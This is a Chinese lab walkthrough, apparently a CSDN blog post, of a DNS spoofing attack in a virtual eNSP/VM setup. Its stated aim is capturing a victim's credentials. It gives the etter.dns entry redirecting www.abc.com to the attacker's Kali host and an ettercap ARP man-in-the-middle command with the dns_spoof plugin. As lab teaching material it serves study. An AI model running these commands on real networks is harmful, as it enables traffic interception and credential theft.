DNS欺骗

目的:获取被攻击者的账号密码

使用设备:

                ENSP

                VM虚拟机

Ensp配置(路由器:AR2220,交换机S5700)

云配置:

Kali

Win7

Win server 2018

192.168.10.10

192.168.10.20

192.168.20.10

网卡VM8

网卡VM1

网卡VM2

Server-Server2配置(DNS服务器):

目的:配置IP、掩码、网关

        目的:开启DNS服务,增加域名和IP地址对应的DNS条目

                   使其他设备可以通过域名进行访问

VM虚拟机配置

kali配置:

Win7配置:

Win server配置:

1.1 然后先搭建Web服务

1.2 配置Web主页,进入到Web服务器的根目录,将Web主页复制到这个目录下

(其余具体配置可参照ARP欺骗实验和IP重定向实验配置)

开始实验

2.1 在Win7上安装火狐浏览器,开始访问web服务

此时访问是成功的(IP或者域名)

2.2 在kali上进行攻击

命令1: vim /etc/ettercap/etter.dns

        进入编辑界面最后一行(shift+G)

        www.abc.com A 192.168.10.10

注释:www.abc.com(域名)

        192.168.10.10(kali IP地址)

目的:将  www.abc.com (此域名)引流到 192.168.10.10(kali IP地址)

命令2:service apache2 start

目的:在kali上开启apaceh服务

验证:浏览器输入IP访问 192.168.10.10(kali的IP地址)

命令3:ettercap -i eth0 -Tp -M arp:remote -P dns_spoof /192.168.10.20// /192.168.10.254//

注释:T文本模式怡示

         P非混杂模式

        -M中间人攻击

        remote为双向模式,同时欺骗通信的双方

        -P调用dns_spocof插件进行dns欺骗攻击

        192.168.10.20为目标主机IP(win7的IP地址)

        192.168.10.254为网关的IP地址

以上命令其实是实现了两次欺骗攻击,一次是ARP欺骗,一次是DNS欺骗:

        ARP欺骗的目的是将win7的DNS解析请求报文发送到kali

                (MAC地址——引流)

        DNS欺骗目的是给win7回复错误的DNS解析结果

2.3 在win7 上查看实验结果

命令4:ping www.abc.com

结论:可以看到回复地址为192.168.10.10(kali的IP地址),实验成功,可以在win7上进行域名访问,结果如下图:

注:如果win7使用浏览器通过域名(www.abs.com)访问网页还是没有变化(DNS缓存没有清除),则使用命令:ipconfig /flushdns。

命令:ipconfig /flushdns的作用

        ipconfig /flushdns 这是清除DNS缓存用的

来自 <ipconfig /flushdns 清除系统DNS缓存_chenlycly的专栏-CSDN博客_dns flush>

  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值